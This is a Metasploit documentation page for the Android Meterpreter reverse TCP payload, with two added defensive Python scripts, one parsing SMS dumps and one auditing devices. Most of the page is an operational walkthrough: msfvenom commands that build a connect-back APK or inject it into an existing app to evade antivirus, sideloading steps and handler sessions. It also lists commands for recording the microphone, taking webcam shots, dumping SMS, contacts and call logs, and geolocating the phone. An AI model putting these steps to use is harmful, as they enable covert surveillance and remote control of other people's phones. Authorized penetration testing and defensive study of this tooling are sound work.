Android Meterpreter, Android Reverse TCP Stager - Metasploit
This page contains detailed information about how to use the payload/android/meterpreter/reverse_tcp metasploit module. For a list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Android Meterpreter, Android Reverse TCP Stager
Module: payload/android/meterpreter/reverse_tcp
Source code: modules/payloads/stagers/android/reverse_tcp.rb
Disclosure date: -
Last modification time: 2020-09-22 02:56:51 +0000
Supported architecture(s): dalvik
Supported platform(s): Android
Target service / protocol: -
Target network port(s): -
List of CVEs: -
Run a meterpreter server in Android. Connect back stager
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
msf > use payload/android/meterpreter/reverse_tcp
msf payload(reverse_tcp) > show options
... show and set options ...
msf payload(reverse_tcp) > generate
To learn how to generate payload/android/meterpreter/reverse_tcp with msfvenom, please read this.
Required Options
- LHOST: The listen address (an interface may be specified)
Knowledge Base
The android/meterpreter/reverse_tcp payload is a Java-based Meterpreter that can be used on an Android device. It is still at an early stage of development, but there are so many things you can do with it already.
The Android Meterpreter allows you to do things like take remote control of the file system, listen to phone calls, retrieve or send SMS messages, geo-locate the user, run post-exploitation modules, etc.
Vulnerable Application
You can test android/meterpreter/reverse_tcp on these devices:
Android Emulator
An emulator is the most convenient way to test Android Meterpreter. You can try:
- Android SDK - Creates and manages your emulators from a command prompt or terminal.
- Android Studio - Allows you to manage emulators more easily than the SDK.
- GenyMotion - Requires an account.
- AndroidAVDRepo - Contains a collection of pre-configured emulators.
A real Android device
Having a real Android device allows you to test features or vulnerabilities you don't necessarily have from an emulator, which might be specific to a manufacturer, carrier, or hardware. You also get to test it over a real network.
Verification Steps
Currently, the most common way to use Android Meterpreter is to create it as an APK, and then execute it.
To create the APK with msfconsole:
msf > use payload/android/meterpreter/reverse_tcp
msf payload(reverse_tcp) > set LHOST 192.168.1.199
LHOST => 192.168.1.199
msf payload(reverse_tcp) > generate -t raw -f /tmp/android.apk
[*] Writing 8992 bytes to /tmp/android.apk...
msf payload(reverse_tcp) >
To create the APK with msfvenom:
./msfvenom -p android/meterpreter/reverse_tcp LHOST=[IP] LPORT=4444 -f raw -o /tmp/android.apk
To inject meterpreter into an existing APK with msfvenom:
You can also add Android meterpreter to any existing APK. This will make it harder for Anti-virus software to detect the payload, and allow you to read internal files and take screenshots of the Android app that you are backdooring:
./msfvenom -p android/meterpreter/reverse_tcp -x com.existing.apk LHOST=[IP] LPORT=4444 -f raw -o /tmp/android.apk
Please see here for more documentation on Android injection.
Next, start an Android device. Upload the APK, and execute it. There are different ways to do this, so please refer to the Scenarios section for more information.
Important Basic Commands
pwd
The pwd command allows you to see the current directory you're in.
meterpreter > pwd
/data/data/com.metasploit.stage
cd
The cd command allows you to change directory. For example:
meterpreter > cd cache
meterpreter > ls
cat
The cat command allows you to see the contents of a file.
ls
The ls command displays items in a directory. For example:
meterpreter > ls
Listing: /data/data/com.metasploit.stage/files
==============================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100444/r--r--r-- 0 fil 2016-03-08 14:56:08 -0600 rList-com.metasploit.stage.MainActivity
upload
The upload command allows you to upload a file to the remote target. The -r option allows you to do so recursively.
download
The download command allows you to download a file from the remote target. The -r option allows you to do so recursively.
search
The search command allows you to find files on the remote target. For example:
meterpreter > search -d . -f *.txt
ifconfig
The ifconfig command displays the network interfaces on the remote machine.
meterpreter > ifconfig
...
Interface 10
============
Name : wlan0 - wlan0
Hardware MAC : 60:f1:89:07:c2:7e
IPv4 Address : 192.168.1.207
IPv4 Netmask : 255.255.255.0
IPv6 Address : 2602:30a:2c51:e660:62f1:89ff:fe07:c27e
IPv6 Netmask : ::
IPv6 Address : fe80::62f1:89ff:fe07:c27e
IPv6 Netmask : ::
IPv6 Address : 2602:30a:2c51:e660:81ae:6bbd:e0e1:5954
IPv6 Netmask : ::
...
getuid
The getuid command shows the current user that the payload is running as:
meterpreter > getuid
Server username: u0_a231
ps
The ps command shows a list of processes the Android device is running. For example:
meterpreter > ps
Process List
============
PID Name Arch User
--- ---- ---- ----
1 /init root
2 kthreadd root
3 ksoftirqd/0 root
7 migration/0 root
8 rcu_preempt root
9 rcu_bh root
10 rcu_sched root
11 watchdog/0 root
12 watchdog/1 root
13 migration/1 root
14 ksoftirqd/1 root
17 watchdog/2 root
18 migration/2 root
19 ksoftirqd/2 root
22 watchdog/3 root
23 migration/3 root
...
shell
The shell command allows you to interact with a shell:
meterpreter > shell
Process 1 created.
Channel 1 created.
id
uid=10231(u0_a231) gid=10231(u0_a231) groups=1015(sdcard_rw),1028(sdcard_r),3003(inet),9997(everybody),50231(all_a231) context=u:r:untrusted_app:s0
To get back to the Meterpreter prompt, you can do: [CTRL]+[Z]
sysinfo
The sysinfo command shows you basic information about the Android device.
meterpreter > sysinfo
Computer : localhost
OS : Android 5.1.1 - Linux 3.10.61-6309174 (aarch64)
Meterpreter : java/android
webcam_list
The webcam_list command shows a list of webcams you could use for the webcam_snap command. Example:
meterpreter > webcam_list
1: Back Camera
2: Front Camera
webcam_snap
The webcam_snap command takes a picture from the device. You will have to use the webcam_list command to figure out which camera to use. Example:
meterpreter > webcam_snap -i 2
[*] Starting...
[+] Got frame
[*] Stopped
Webcam shot saved to: /Users/user/rapid7/msf/uFWJXeQt.jpeg
record_mic
The record_mic command records audio. Good for listening to a phone conversation, as well as other uses. Example:
meterpreter > record_mic -d 20
[*] Starting...
[*] Stopped
Audio saved to: /Users/user/rapid7/msf/YAUtubCR.wav
activity_start
The activity_start command executes an action on the device by starting an Android activity from a URI string.
check_root
The check_root command detects whether your payload is running as root or not. Example:
meterpreter > check_root
[*] Device is not rooted
dump_calllog
The dump_calllog command retrieves the call log from the Android device.
dump_contacts
The dump_contacts command retrieves the contacts list from the Android device. For example:
meterpreter > dump_contacts
[*] Fetching 5 contacts into list
[*] Contacts list saved to: contacts_dump_20160308155744.txt
geolocate
The geolocate command allows you to locate the phone by retrieving the current lat-long using geolocation.
wlan_geolocate
The wlan_geolocate command allows you to locate the phone by retrieving the current lat-long using WLAN information. Example:
meterpreter > wlan_geolocate
[*] Google indicates the device is within 150 meters of 30.*******,-97.*******.
[*] Google Maps URL: https://maps.google.com/?q=30.*******,-97.*******
send_sms
The send_sms command allows you to send an SMS message. Keep in mind the phone will keep a copy of it, too.
meterpreter > send_sms -d "2674554859" -t "hello"
[+] SMS sent - Transmission successful
sms_dump
The sms_dump command allows you to retrieve SMS messages and save them as a text file. For example:
meterpreter > dump_sms
[*] Fetching 4 sms messages
[*] SMS messages saved to: sms_dump_20160308163212.txt
...
$ cat sms_dump_20160308163212.txt
=====================
[+] SMS messages dump
=====================
Date: 2016-03-08 15:30:12 -0600
OS: Android 5.1.1 - Linux 3.10.61-6309174 (aarch64)
Remote IP: 192.168.1.207
Remote Port: 59130
#1
Type : Incoming
Date : 2016-03-08 15:29:32
Address : **********
Status : NOT_RECEIVED
Message : Hello world
...
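A responder who recovers one of these sms_dump_*.txt files (from a seized operator workstation, or from a lab run of this payload to see exactly what it exfiltrates) usually wants it as structured records rather than free text. The parser below is an added example and is not part of this page or of Metasploit. The sample dump embedded in it is constructed to follow the layout shown above with a made-up phone number and message bodies; because the exact padding before each colon is an assumption, entry #1 uses tabs and entry #2 uses spaces, and the parser accepts either.

```python
import re
from collections import Counter
from dataclasses import dataclass, field


# Constructed sample in the layout of the sms_dump_*.txt file shown above.
# The phone number and message bodies are made up; only the structure follows
# the page. Entry #1 pads with tabs and #2 with spaces because the real padding
# before the colon is an assumption.
SAMPLE_DUMP = """\
=====================
[+] SMS messages dump
=====================
Date: 2016-03-08 15:30:12 -0600
OS: Android 5.1.1 - Linux 3.10.61-6309174 (aarch64)
Remote IP: 192.168.1.207
Remote Port: 59130

#1
Type\t: Incoming
Date\t: 2016-03-08 15:29:32
Address\t: +15550100
Status\t: NOT_RECEIVED
Message\t: Hello world

#2
Type    : Outgoing
Date    : 2016-03-08 15:31:02
Address : +15550100
Status  : SENT
Message : see you at 10:30, reply here
"""

ENTRY_RE = re.compile(r"^#(\d+)\s*$")
# key, optional padding, colon, one optional separator, value (the value may contain colons)
FIELD_RE = re.compile(r"^([A-Za-z][A-Za-z ]*?)[ \t]*:[ \t]?(.*)$")


@dataclass
class SmsRecord:
    index: int
    attrs: dict = field(default_factory=dict)


@dataclass
class SmsDump:
    header: dict = field(default_factory=dict)
    messages: list = field(default_factory=list)


def parse_sms_dump(text):
    """Parse the dump into a header dict plus one SmsRecord per '#N' entry."""
    dump = SmsDump()
    current = None
    for raw in text.splitlines():
        line = raw.rstrip("\r")
        if not line.strip() or line.startswith("=") or line.startswith("[+]"):
            continue  # banner and blank lines carry no data
        m = ENTRY_RE.match(line)
        if m:
            current = SmsRecord(int(m.group(1)))
            dump.messages.append(current)
            continue
        m = FIELD_RE.match(line)
        if m:
            key, value = m.group(1).strip(), m.group(2).rstrip()
            (dump.header if current is None else current.attrs)[key] = value
        elif current is not None and "Message" in current.attrs:
            # Anything else inside an entry is treated as a continuation of the body.
            current.attrs["Message"] += "\n" + line
        # Unrecognised lines before the first entry are ignored rather than fatal.
    return dump


def summarize(dump):
    """Triage view: which device the dump came from, counts, parties, time span."""
    by_type = Counter(m.attrs.get("Type", "unknown") for m in dump.messages)
    dates = sorted(m.attrs["Date"] for m in dump.messages if "Date" in m.attrs)
    return {
        "remote_ip": dump.header.get("Remote IP"),
        "os": dump.header.get("OS"),
        "count": len(dump.messages),
        "by_type": dict(by_type),
        "addresses": sorted({m.attrs["Address"] for m in dump.messages if "Address" in m.attrs}),
        "first": dates[0] if dates else None,
        "last": dates[-1] if dates else None,
    }


if __name__ == "__main__":
    for key, value in summarize(parse_sms_dump(SAMPLE_DUMP)).items():
        print(f"{key}: {value}")
```

Point parse_sms_dump at the contents of a real dump file to get the same summary; the Remote IP and Remote Port in the header are the device's side of the Meterpreter connection at the time of the dump, which is the value to correlate with network logs.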
run
The run command allows you to run a post module against the remote machine at the Meterpreter prompt. For example:
meterpreter > run post/android/capture/screen
Scenarios
Uploading APK to an Emulator using install_msf_apk.sh
The Metasploit Framework comes with a script that allows you to automatically upload your APK to an active emulator and execute it. It requires the Android SDK platform-tools to run, as well as Java.
To use this, follow these steps:
- Start the Android Emulator
- Generate the Android payload as an APK.
- In msfconsole, start a handler for android/meterpreter/reverse_tcp
- Run the installer script like this from a terminal:
$ tools/exploit/install_msf_apk.sh /tmp/android.apk
The script will do something like this:
$ tools/exploit/install_msf_apk.sh /tmp/android.apk
adding: META-INF/ANDROIDD.SF
adding: META-INF/ANDROIDD.RSA
signing: classes.dex
signing: AndroidManifest.xml
signing: resources.arsc
Failure
1562 KB/s (10715 bytes in 0.006s)
pkg: /data/local/tmp/android.apk
Success
rm failed for -f, Read-only file system
Starting: Intent { act=android.intent.action.MAIN cmp=com.metasploit.stage/.MainActivity }
Back in msfconsole, you should receive a session:
[*] Started reverse TCP handler on 192.168.1.199:4444
[*] Starting the payload handler...
[*] Sending stage (62432 bytes) to 192.168.1.199
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.199:49178) at 2016-03-08 13:00:10 -0600
meterpreter >
Uploading APK to a real Android device using install_msf_apk.sh
On the Android device, make sure to enable Developer Options. To do this:
- Go to Settings -> About -> Software Information
- Tap on the Build Number section a couple of times. It should unlock Developer Options.
- Go back to the Settings page, you should see Developer Options.
Under Developer Options, make sure to:
- Enable USB debugging
- Disable Verify apps via USB
- Open a terminal, and type: adb devices
- On your Android device, you should see a prompt asking you to allow the computer for debugging; click OK on that.
- Run adb devices again; adb should now have access.
Run the installer script like this from a terminal:
$ tools/exploit/install_msf_apk.sh /tmp/android.apk
And you should get a session.
Uploading APK from a Web Server
One way to upload an APK to Android without adb is by hosting it from a web server. To do this, you must allow installation from "Unknown sources". The way to do this varies, but normally it's something like this: Settings -> Security -> Check "Unknown Sources"
Once you have that changed, you'll need to:
- Generate the APK payload.
- Start a web server from the directory where the payload is:
ruby -run -e httpd . -p 8181
- On your Android device, open a browser, and download the APK.
- You should be able to find the APK from the Downloads folder, install it.
- After installation, you will have to manually execute it.
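For an administrator or responder checking a test device, the settings the two install paths above depend on (USB debugging on, "Verify apps via USB" off, "Unknown sources" on) and the stock stage package name seen in the pwd/ls output earlier are the first things to look for. The script below is an added example, not part of this page or of Metasploit: it parses constructed samples of `adb shell settings list global`, `adb shell settings list secure` and `adb shell pm list packages -f` output and reports findings. The setting keys adb_enabled, verifier_verify_adb_installs, package_verifier_enable and install_non_market_apps are assumptions about the names exposed through `adb shell settings` and vary across Android versions (on current releases "Unknown sources" is a per-app permission, not one switch). A stage injected into an existing APK with msfvenom -x keeps that app's package name, so the name check only covers the stand-alone stage; every user-installed package is listed for manual review to cover that case.

```python
import subprocess

# Constructed sample of `adb shell settings list global` from a lab device
# configured as the steps above describe. Key names are assumptions about
# Settings.Global names; confirm them for your Android version.
GLOBAL_SETTINGS = """\
adb_enabled=1
airplane_mode_on=0
package_verifier_enable=1
verifier_verify_adb_installs=0
"""

# Constructed sample of `adb shell settings list secure` (install_non_market_apps
# is the legacy 'Unknown sources' switch; newer releases handle it per app).
SECURE_SETTINGS = """\
install_non_market_apps=1
location_mode=3
"""

# Constructed sample of `adb shell pm list packages -f`.
PACKAGE_LIST = """\
package:/system/priv-app/Settings/Settings.apk=com.android.settings
package:/data/app/com.example.notes-1/base.apk=com.example.notes
package:/data/app/com.metasploit.stage-1/base.apk=com.metasploit.stage
"""

# Package name the stand-alone stage runs under, as seen in the pwd/ls output above.
KNOWN_STAGE_PACKAGES = {"com.metasploit.stage"}


def parse_settings(text):
    """Turn `settings list` output (one key=value per line) into a dict."""
    settings = {}
    for line in text.splitlines():
        key, sep, value = line.partition("=")
        if sep:
            settings[key.strip()] = value.strip()
    return settings


def parse_package_list(text):
    """Map package name -> APK path from `pm list packages -f` output."""
    packages = {}
    for line in text.splitlines():
        if not line.startswith("package:"):
            continue
        path, sep, name = line[len("package:"):].rpartition("=")
        if sep:
            packages[name] = path
    return packages


def audit_device(global_settings, secure_settings, packages):
    """Return (finding_id, detail) pairs: weak settings the install paths above
    rely on, the stock stage package, and user-installed apps to review."""
    findings = []
    if global_settings.get("adb_enabled") == "1":
        findings.append(("usb_debugging_enabled",
                         "adb_enabled=1: APKs can be sideloaded over USB"))
    if global_settings.get("verifier_verify_adb_installs") == "0":
        findings.append(("adb_install_verification_disabled",
                         "verifier_verify_adb_installs=0: 'Verify apps via USB' is off"))
    if global_settings.get("package_verifier_enable") == "0":
        findings.append(("package_verifier_disabled",
                         "package_verifier_enable=0: app verification is off"))
    if secure_settings.get("install_non_market_apps") == "1":
        findings.append(("unknown_sources_enabled",
                         "install_non_market_apps=1: installs from 'Unknown sources' allowed"))
    for name, path in sorted(packages.items()):
        if name in KNOWN_STAGE_PACKAGES:
            findings.append(("known_stage_package_installed", f"{name} at {path}"))
        elif path.startswith("/data/app/"):
            # A stage injected into another APK (msfvenom -x) keeps that app's
            # name, so every user-installed package is listed for manual review.
            findings.append(("user_installed_package", f"{name} at {path}"))
    return findings


def audit_samples():
    """Run the audit over the constructed samples above."""
    return audit_device(parse_settings(GLOBAL_SETTINGS),
                        parse_settings(SECURE_SETTINGS),
                        parse_package_list(PACKAGE_LIST))


def adb_shell(*args):
    """Collect real output from a connected device (needs platform-tools on PATH)."""
    return subprocess.run(["adb", "shell", *args], capture_output=True,
                          text=True, check=True).stdout


if __name__ == "__main__":
    for finding_id, detail in audit_samples():
        print(f"[{finding_id}] {detail}")
```

To run it against a connected device, feed `adb_shell("settings", "list", "global")`, `adb_shell("settings", "list", "secure")` and `adb_shell("pm", "list", "packages", "-f")` into the parsers instead of the constructed strings.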
Reconnect Android Meterpreter from the Browser Remotely
When you have the APK payload installed on your Android device, another trick to reconnect it is to launch an intent from a browser. An intent is simply a term in Android development that means "an operation to be performed."
Here's how you do this:
- In msfconsole, start a multi/handler for android/meterpreter/reverse_tcp as a background job.
- Do: use auxiliary/server/android_browsable_msf_launch
- Set the URIPATH if needed.
- Do: run. At this point, the web server should be up.
- On your Android device, open the native web browser, and go to the URL generated by the auxiliary module.
- The Android handler should get a session like the following demo:
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD android/meterpreter/reverse_tcp
PAYLOAD => android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.199
LHOST => 192.168.1.199
msf exploit(handler) > set EXITONSESSION false
EXITONSESSION => false
msf exploit(handler) > run -j
[*] Exploit running as background job.
[*] Started reverse TCP handler on 192.168.1.199:4444
msf exploit(handler) > [*] Starting the payload handler...
msf exploit(handler) > use auxiliary/server/android_browsable_msf_launch
msf auxiliary(android_browsable_msf_launch) > set URIPATH /test
URIPATH => /test
msf auxiliary(android_browsable_msf_launch) > run
[*] Using URL: http://0.0.0.0:8080/test
[*] Local IP: http://192.168.1.199:8080/test
[*] Server started.
[*] Sending HTML...
[*] Sending stage (62432 bytes) to 192.168.1.207
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.207:47523) at 2016-03-08 15:09:25 -0600
Msfconsole Usage
Here is how the android/meterpreter/reverse_tcp payload looks in the msfconsole:
msf6 > use payload/android/meterpreter/reverse_tcp
msf6 payload(android/meterpreter/reverse_tcp) > show info
Name: Android Meterpreter, Android Reverse TCP Stager
Module: payload/android/meterpreter/reverse_tcp
Platform: Android
Arch: dalvik
Needs Admin: No
Total size: 10176
Rank: Normal
Provided by:
mihi
egypt <[email protected]>
OJ Reeves
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Description:
Run a meterpreter server in Android. Connect back stager
Module Options
This is a complete list of options available in the android/meterpreter/reverse_tcp payload:
msf6 payload(android/meterpreter/reverse_tcp) > show options
Module options (payload/android/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Advanced Options
Here is a complete list of advanced options supported by the android/meterpreter/reverse_tcp payload:
msf6 payload(android/meterpreter/reverse_tcp) > show advanced
Module advanced options (payload/android/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
AndroidHideAppIcon false no Hide the application icon automatically after launch
AndroidMeterpreterDebug false no Run the payload in debug mode, with logging enabled
AndroidWakelock true no Acquire a wakelock before starting the payload
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EnableStageEncoding false no Encode the second stage payload
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Related Pull Requests
- #14584 Merged Pull Request: Implement the zeitwerk autoloader within lib/msf/base
- #14202 Merged Pull Request: Implement the zeitwerk autoloader within lib/msf/core
- #8338 Merged Pull Request: Fix msf/core and self.class msftidy warnings
- #7634 Merged Pull Request: Implement universal HTTP/S handlers for Meterpreter payloads
- #7292 Merged Pull Request: add android stageless meterpreter_reverse_tcp
- #6655 Merged Pull Request: use MetasploitModule as a class name
- #5608 Merged Pull Request: Android and Java transport resiliency, hot swapping, sleep handling, and timeout management
- #5348 Merged Pull Request: Feature/msp 12358/ntds dump module
- #5367 Merged Pull Request: Create new UUID stagers
- #2525 Merged Pull Request: Change module boilerplate
- #1708 Merged Pull Request: android meterpreter
See Also
Check also the following modules related to this module:
- payload/android/meterpreter/reverse_http
- payload/android/meterpreter_reverse_http
- payload/android/meterpreter/reverse_https
- payload/android/meterpreter_reverse_https
- payload/android/meterpreter_reverse_tcp
- payload/android/shell/reverse_http
- payload/android/shell/reverse_https
- payload/android/shell/reverse_tcp
Authors
- mihi
- egypt
- OJ Reeves
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.